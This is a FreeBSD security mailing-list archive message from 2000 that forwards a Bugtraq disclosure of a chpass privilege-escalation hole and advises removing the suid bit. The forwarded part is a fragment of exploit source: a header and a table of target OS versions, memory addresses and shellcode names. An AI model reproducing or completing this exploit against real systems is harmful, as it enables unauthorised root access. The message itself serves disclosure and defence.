Date: Wed, 4 Oct 2000 00:16:45 -0500 (CDT) From: Mike Silbersack <silby@silby.com> To: security@freebsd.org Subject: BSD chpass (fwd) Message-ID: <Pine.BSF.4.21.0010040014430.35500-100000@achilles.silby.com>
next in thread | raw e-mail | index | archive | help
For those not subscribed to bugtraq, it's time to remove the suid bit on
chpass.
Mike "Silby" Silbersack
---------- Forwarded message ----------
Date: Wed, 4 Oct 2000 02:45:48 +1000
From: caddis <caddis@DISSENSION.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: BSD chpass
/*
* TESO BSD chpass exploit - caddis <caddis@dissension.net>
*
* greets: #!teso, #!w00w00, #hert!, #ozsecurity, #plus613
*
*/
#include <stdio.h>
struct platform targets[9] =
{
{ "OpenBSD 2.7 i386 ", 141, 0xdfbfd25c, 0xdfbfdc32, ptmp_shellcode },
{ "OpenBSD 2.6 i386 ", 149, 0xdfbfd224, 0xdfbfdc1a, ptmp_shellcode },
{ "OpenBSD 2.5 1999/08/06 ", 161, 0xefbfd1a0, 0xefbfdbd6, ptmp_shellcode },
{ "OpenBSD 2.5 1998/05/28 ", 121, 0xefbfd2b0, 0xefbfdc6e, ptmp_shellcode },
{ "FreeBSD 4.0-RELEASE ", 167, 0x805023c, 0xbfbffc68, bsd_shellcode },
{ "FreeBSD 3.5-RELEASE ", 135, 0x804fa58, 0xbfbfdcac, bsd_shellcode },
{ "FreeBSD 3.4-RELEASE ", 131, 0x804f988, 0xbfbfdcd0, bsd_shellcode },
{ "NetBSD 1.4.2 ", 132, 0xbfbfd314, 0xbfbfdc36, bsd_shellcode },
{ NULL, 0, 0, 0, NULL }
};
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.4.21.0010040014430.35500-100000>